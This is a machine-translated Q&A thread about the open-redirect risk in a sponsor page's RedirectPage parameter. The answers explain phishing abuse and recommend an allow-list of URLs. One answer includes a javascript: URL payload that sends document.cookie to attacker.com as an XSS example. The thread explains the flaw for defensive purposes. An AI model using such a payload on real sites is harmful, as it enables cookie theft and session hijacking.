你能在这里找到网络安全问题吗？

Question

我有一个重定向到另一个网页的网页：

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

然后，Sponsor.php页面会显示一个广告，其中包含“继续浏览您的网页”链接。链接到传入的RedirectPage。是否存在可能由此引起的安全/欺骗问题？处理这个问题的最佳方法是什么？ （请注意，用户未登录任一站点）

Answer 1

这是一个大问题。如果我发给你的链接如下：

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

你会想到“哦，CNN，这是一个合法的网站”，然后你打开它并点击“继续你的页面”链接。然后你就会进入网络上最讨厌的色情网站之一，并且会有一个巨大的男性声音宣布给你所有的同事“Hot Damn I Want to！@ $ @＃$ Your ！（＆amp;＆＃164;＆amp; ^ $＆＃167;直到我不能＆＃161;＆＃8976; ^（！＃~~＆amp; $ ^＃！@ $ !! ＆quot; ;你必须向你的老板解释“我认为这是CNN！”

此处的漏洞是您的声誉。像这样的盲目重定向是危险的。

那只是一洞。怎么样？

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

现在我已经对您的网站进行了XSS编辑并窃取了用户的Cookie。当然，你说没有登录信息，但会话数据怎么样？或者，稍后添加登录信息，或者公司中的其他人在一年后用户登录时使用此页面。

Answer 2

这绝对是一种安全风险。在涉及安全性时，应避免使用in-URL变量。

虽然没有什么是完全安全的，但这是解决此问题的更好方法： http： //www.webmasterworld.com/forum88/2910.htm

Answer 3

如果sponsor.php允许任何值进入RedirectPage和广告意味着支持，或鼓励人们认为他们在正确的轨道上，那么您将打开它成为网络钓鱼攻击的一部分。更糟糕的是，你可能会从这些攻击中获利，这可能会让人们感到不高兴。

保留允许的网址列表（或他们可以遵循的模式）将大大有助于防止出现问题。